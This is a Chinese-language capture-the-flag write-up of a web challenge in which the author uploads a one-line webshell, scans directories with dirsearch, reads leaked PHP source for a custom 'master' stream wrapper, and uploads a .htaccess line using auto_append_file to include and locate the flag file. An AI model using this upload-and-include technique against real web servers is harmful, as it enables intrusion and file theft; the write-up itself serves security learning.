image.png
    题目是一个购物网站,个人中心中有个上传点,但是点击后提示image.png
    其他地方也就是普普通通的购物流程,看起来应该就是上传漏洞。
    试了下上传一句话,发现居然上传成功了,但是不知道上传到哪里去了,使用dirsearch扫描下,看到了uploads目录,顺带还有robots.txt、config.txt、sql.txt

    1. [10:46:46] 500 -    0B  - /config.php
    2. [10:46:46] 200 -    2KB - /config.txt
    3. [10:46:49] 200 -    8KB - /index
    4. [10:46:49] 200 -    1KB - /index.html
    5. [10:46:49] 200 -    0B  - /index.php
    6. [10:46:49] 200 -    0B  - /index.php/login/
    7. [10:46:49] 200 -    1KB - /info.php
    8. [10:46:49] 200 -  499B  - /info.html
    9. [10:46:50] 200 -    3KB - /login
    10. [10:46:50] 200 -    1KB - /login.html
    11. [10:46:50] 200 -    3KB - /login.php
    12. [10:46:50] 200 -    0B  - /logout
    13. [10:46:50] 200 -    0B  - /logout.php
    14. [10:46:54] 200 -    4KB - /register.php
    15. [10:46:54] 200 -    4KB - /register
    16. [10:46:54] 200 -    2KB - /register.html
    17. [10:46:54] 200 -  987B  - /reset.html
    18. [10:46:54] 200 -   21B  - /robots.txt
    19. [10:46:54] 200 -   13B  - /search.php
    20. [10:46:54] 403 -  306B  - /server-status
    21. [10:46:54] 403 -  307B  - /server-status/
    22. [10:46:54] 200 -    8KB - /shop
    23. [10:46:55] 200 -  457B  - /sql.txt
    24. [10:46:55] 301 -  328B  - /static  ->  http://111.200.241.244:59933/static/
    25. [10:46:56] 200 -   13B  - /upload.php
    26. [10:46:56] 200 -    5KB - /uploads/
    27. [10:46:56] 200 -   12B  - /user.php
    28. [10:46:56] 200 -   12B  - /user
    29. [10:46:56] 301 -  329B  - /uploads  ->  http://111.200.241.244:59933/uploads/
    30. [10:46:56] 200 -  284B  - /user.html

    先去uploads目录看下,image.png
    在其中一个文件夹中找到了上传的一句话,但是打开后发现<,"被替换成!,想要绕过这个感觉不太现实,只能去看看刚才扫到的其他东西。
    在config.txt中看到了源码:

    1. <?php
    3. class master
    4. {
    5.     private $path;
    6.     private $name;
    8.     function __construct()
    9.     {
    11.     }
    13.     function stream_open($path)
    14.     {
    15.         if(!preg_match('/(.*)\/(.*)$/s',$path,$array,0,9))
    16.             return 1;
    17.         $a=$array[1];
    18.         parse_str($array[2],$array);
    20.         if(isset($array['path']))
    21.         {
    22.             $this->path=$array['path'];
    23.         }
    24.         else
    25.             return 1;
    26.         if(isset($array['name']))
    27.         {
    28.             $this->name=$array['name'];
    29.         }
    30.         else
    31.             return 1;
    33.         if($a==='upload')
    34.         {
    35.             return $this->upload($this->path,$this->name);
    36.         }
    37.         elseif($a==='search')
    38.         {
    39.             return $this->search($this->path,$this->name);
    40.         }
    41.         else 
    42.             return 1;
    43.     }
    44.     function upload($path,$name)
    45.     {
    46.         if(!preg_match('/^uploads\/[a-z]{10}\/$/is',$path)||empty($_FILES[$name]['tmp_name']))
    47.             return 1;
    49.         $filename=$_FILES[$name]['name'];
    50.         echo $filename;
    52.         $file=file_get_contents($_FILES[$name]['tmp_name']);
    54.         $file=str_replace('<','!',$file);
    55.         $file=str_replace(urldecode('%03'),'!',$file);
    56.         $file=str_replace('"','!',$file);
    57.         $file=str_replace("'",'!',$file);
    58.         $file=str_replace('.','!',$file);
    59.         if(preg_match('/file:|http|pre|etc/is',$file))
    60.         {
    61.             echo 'illegalbbbbbb!';
    62.             return 1;
    63.         }
    65.         file_put_contents($path.$filename,$file);
    66.         file_put_contents($path.'user.jpg',$file);
    69.         echo 'upload success!';
    70.         return 1;
    71.     }
    72.     function search($path,$name)
    73.     {
    74.         if(!is_dir($path))
    75.         {
    76.             echo 'illegal!';
    77.             return 1;
    78.         }
    79.         $files=scandir($path);
    80.         echo '</br>';
    81.         foreach($files as $k=>$v)
    82.         {
    83.             if(str_ireplace($name,'',$v)!==$v)
    84.             {
    85.                 echo $v.'</br>';
    86.             }
    87.         }
    89.         return 1;
    90.     }
    92.     function stream_eof()
    93.     {
    94.         return true;
    95.     }
    96.     function stream_read()
    97.     {
    98.         return '';
    99.     }
    100.     function stream_stat()
    101.     {
    102.         return '';
    103.     }
    105. }
    107. stream_wrapper_unregister('php');
    108. stream_wrapper_unregister('phar');
    109. stream_wrapper_unregister('zip');
    110. stream_wrapper_register('master','master');
    112. ?>

    这段代码意思是将php,phar,zip这三个伪协议禁用,并自己注册一个master伪协议,实现父类stream_open方法,stream_open在包装器初始化时立即调用。
    master协议有两个方法,一个是upload,可以看到里面还是有过滤,走不通,另一个是search方法,给出要搜索的路径和文件名,将搜索到的文件打印出来。

    那么我们就可以使用master协议,搜索flag,但是要使用master协议,就必须有个文件包含的地方,但是找不到,因为文件过滤,也没办法用php文件自己构造。

    最后看了大佬的writeup,才知道还有.htaccess文件可以用。
    上传.htaccess文件,内容为

    1. php_value auto_append_file master://search/path=%2fhome%2f&name=flag

    这段命令相当于自动在php文件后面加上require();,将伪协议直接包含在php文件中,自己在随便上传一个php文件,访问,就可以拿到flag的路径。
    拿到路径之后,继续使用php_value包含就可以得到内容。